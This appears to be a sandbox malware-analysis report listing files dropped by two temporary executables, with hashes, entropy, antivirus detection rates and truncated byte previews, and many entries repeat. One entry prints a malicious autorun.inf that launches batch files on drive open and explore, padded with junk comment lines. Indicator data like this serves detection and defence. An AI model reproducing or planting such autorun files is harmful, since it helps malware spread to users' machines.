                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4248
                                                                                                                                                                                                                                                    Entropy (8bit):7.957329251765754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ibhkgM8ipnEVl8a9ukWu2+/G16c5/2uRIu7F90spS:WkSipneOaRWu2uA6mhIS/pS
                                                                                                                                                                                                                                                    MD5:2547EB3C7FC4309E0E30F0BA91DD9F62
                                                                                                                                                                                                                                                    SHA1:9900F84F829199069CD3DBD212F2C0259B34891D
                                                                                                                                                                                                                                                    SHA-256:C4834842132574F264AB481610796343593B33DB17DD4AB23D327E23134CAC46
                                                                                                                                                                                                                                                    SHA-512:2F0E6A962C7027B9F25F6A74449F43BB47646F6AC0EECD67338B3379983E1D27DBEA618608DEE2B8AEAB44477F8F97DC05F0224319FD58381E4D10F3101BC6C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...H...'^.._....N....F....#`...H....e...[w.=./p....M.6..;lLx.@.....~.j.1.....$O....{..........I]..l...G.M.7a&34U..O.....^.....c....*j,x.. .v.[.....k]..bL......U9.-<...PC@...j............8E...R....2oY.b........d...A.t/DS..]#.|...B..P.^]...5....eW ...4...R.P..$..=w...Ex.U.@..w...K Q.4..!...k@....l..W....<.u'..X.58.Y}....{=.H./.......ou.i....o....X..4..._.U.}..O..4.....o.Z ..R....=wi.........gT...\.(.......i...*3?....H..i......MN.p..f..!.Z.u.R}lv...)1/.HS..pn.....pZ.8...?...4=(.0.l5Iu.D.iL*6a...CE....w......y. .C...:...X.Z........\....G....6.9|@..........g..S..x..T..C$k..s(.....;.........[.V/..%h.....s..Y8........5Y...>..@....u.wm.@.t..S.=..y}T...8....o.;(.D...._i.(.<..(a7..W04J.(..s.u..L...(...:.SX)..W..GH.M.`#..h.....t.u..^...0....d...%.Q..e....^!..(y.J.KF. .Y.....5]E.R.\...bLW.FH:..o...}.*q...O.....n[..)...S9|...b.(.P..........,3....v..H..a@M`b.!.p....#=.....#.Kv......0D........(.d?C{v..t*,S..U..+...u......c.g..,...Hy.S..uQ.y....'.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                    Entropy (8bit):7.1981851936674515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:nZM19YseDprNGmbYRnGI1hTN/vY/uSLmV/xjLD0nUP9rW+dxORWiHEzn:nQ9Y9p0m8hG8tjS6VNv4UPcQORB4
                                                                                                                                                                                                                                                    MD5:CC544179F2D591106D6C8F14D6C1C8C0
                                                                                                                                                                                                                                                    SHA1:3A31D5C3C55DA337A32955423E0F333DF1A41929
                                                                                                                                                                                                                                                    SHA-256:168BFE37E3AC673FE9A996D4FF8507D92EA490A93D20A94E1D2D6C8636154777
                                                                                                                                                                                                                                                    SHA-512:2AEDE5D78DED0BFCFE96C54373A8DB2F556117A177CE9C112A665593E4B3C1391E8D71E2FABF573EE3A4A3DEBA25F014337BE5FE5EC88648C01164BEFF0A85DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...&.Y.x..z..e.h1..]T..~.-./.`6..I.a1..N.*.PB<L....]..H.].......*.......@....==9..m.X.P..&k.....0..8t...=.'...#.0...2..j.Z..u......p..H.V.......V.~jZJB..&....n.&z....C..(X..9..%.B..r.lW9.0.KR.|bz.l..w..=I..F.]..n....#.Ti.o.1....KB.&..0.b:..9...b.lom....K.r.v.d..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4248
                                                                                                                                                                                                                                                    Entropy (8bit):7.957329251765754
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ibhkgM8ipnEVl8a9ukWu2+/G16c5/2uRIu7F90spS:WkSipneOaRWu2uA6mhIS/pS
                                                                                                                                                                                                                                                    MD5:2547EB3C7FC4309E0E30F0BA91DD9F62
                                                                                                                                                                                                                                                    SHA1:9900F84F829199069CD3DBD212F2C0259B34891D
                                                                                                                                                                                                                                                    SHA-256:C4834842132574F264AB481610796343593B33DB17DD4AB23D327E23134CAC46
                                                                                                                                                                                                                                                    SHA-512:2F0E6A962C7027B9F25F6A74449F43BB47646F6AC0EECD67338B3379983E1D27DBEA618608DEE2B8AEAB44477F8F97DC05F0224319FD58381E4D10F3101BC6C9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...H...'^.._....N....F....#`...H....e...[w.=./p....M.6..;lLx.@.....~.j.1.....$O....{..........I]..l...G.M.7a&34U..O.....^.....c....*j,x.. .v.[.....k]..bL......U9.-<...PC@...j............8E...R....2oY.b........d...A.t/DS..]#.|...B..P.^]...5....eW ...4...R.P..$..=w...Ex.U.@..w...K Q.4..!...k@....l..W....<.u'..X.58.Y}....{=.H./.......ou.i....o....X..4..._.U.}..O..4.....o.Z ..R....=wi.........gT...\.(.......i...*3?....H..i......MN.p..f..!.Z.u.R}lv...)1/.HS..pn.....pZ.8...?...4=(.0.l5Iu.D.iL*6a...CE....w......y. .C...:...X.Z........\....G....6.9|@..........g..S..x..T..C$k..s(.....;.........[.V/..%h.....s..Y8........5Y...>..@....u.wm.@.t..S.=..y}T...8....o.;(.D...._i.(.<..(a7..W04J.(..s.u..L...(...:.SX)..W..GH.M.`#..h.....t.u..^...0....d...%.Q..e....^!..(y.J.KF. .Y.....5]E.R.\...bLW.FH:..o...}.*q...O.....n[..)...S9|...b.(.P..........,3....v..H..a@M`b.!.p....#=.....#.Kv......0D........(.d?C{v..t*,S..U..+...u......c.g..,...Hy.S..uQ.y....'.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\takyouhoymc.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1040384
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    MD5:2CDB760530EC92B79EE2BF80371CAC90
                                                                                                                                                                                                                                                    SHA1:70EF5A50636AFAAA91FF0CB0DF77F7E2FE14B6B2
                                                                                                                                                                                                                                                    SHA-256:E0E9067BD90B97AF4C6BCDFEE36FAD24B4CF382BE9314D58532ACC0DB0C7B37B
                                                                                                                                                                                                                                                    SHA-512:E37804EA5CCFD67AC3960AF429C72929286A2FA730953F89FD64E113210870395524FA3873F45F31DAA579F22E06768BA7AA947D58DAED3C2B8907B754B15342
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...`.......A............@.........................................................................x...<.......................................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:Microsoft Windows Autorun file
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):812
                                                                                                                                                                                                                                                    Entropy (8bit):4.939318306408468
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:1MbqKssMbqKsGMbqKsD5UXzMbqKsDdVEsMbqKsDVcUEuMbqKs5:1MqKLMqKnMqKsKjMqKsdPMqKsPfMqKC
                                                                                                                                                                                                                                                    MD5:76334BDF7885809657E5BDC7EC6EFDF5
                                                                                                                                                                                                                                                    SHA1:5313B492144559874B47911EFBC9AB9CD88547BB
                                                                                                                                                                                                                                                    SHA-256:14087DA5E6309C81BA8AB6C11C3E4A2C2B1571BD7F9FEEB75B92B5021A87C223
                                                                                                                                                                                                                                                    SHA-512:95E7AE478B163200A9C04E70DE8E5D9473C5B545D794C504F05DEF2063B2A6FA8D40CBF4B921241E665B47F4338067D8AA543DB95E0C877074130EA0C55C821C
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Preview:;icodwrcunvoaylwpeykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..[AutoRun]..;peykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..open=ylnagyfkxg.bat..;oaylwpeykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..shell\\open\\Command=qfjygajqfqgo.bat _..;rzsecpaticodwrcunvoaylwpeykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..shell\\open\\Default=1..shell\\explore\\Default=2..;rcunvoaylwpeykzsnyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..shell\\explore\\Command=qhneokveviakxo.bat _..;snyqjrkwuhslaugvojumfngsqdohwqcrkfqibjcomzkdsmyngbmexfykivgzoiujcxiatbugercvkeqfytewpxqcany..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):479232
                                                                                                                                                                                                                                                    Entropy (8bit):7.862740136854356
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:qIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUpvP:qIXsgtvm1De5YlOx6lzBH46UpvP
                                                                                                                                                                                                                                                    MD5:94974F1E2AB7872225F985D76E99EDB0
                                                                                                                                                                                                                                                    SHA1:F6665BC49B88D92CF38889EDB3005FEDD0E8E2FF
                                                                                                                                                                                                                                                    SHA-256:ECFD69B6CFAFA48F7B5BCB6BCF0BCCF3C91E7CC7996DDADDDA5709ADD7F5A539
                                                                                                                                                                                                                                                    SHA-512:9380FF4823E65116C1EEE36F8CE43CCD9D0B7B371F1DA0C410237EC0DC3869646D78D820B712931982D1202F133A72C2671FE06E4EF17527A7482F65624E63AC
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...........A............@..........................P..............................................x...<........w..............................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc....w..........................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):479232
                                                                                                                                                                                                                                                    Entropy (8bit):7.862740136854356
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:qIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUpvP:qIXsgtvm1De5YlOx6lzBH46UpvP
                                                                                                                                                                                                                                                    MD5:94974F1E2AB7872225F985D76E99EDB0
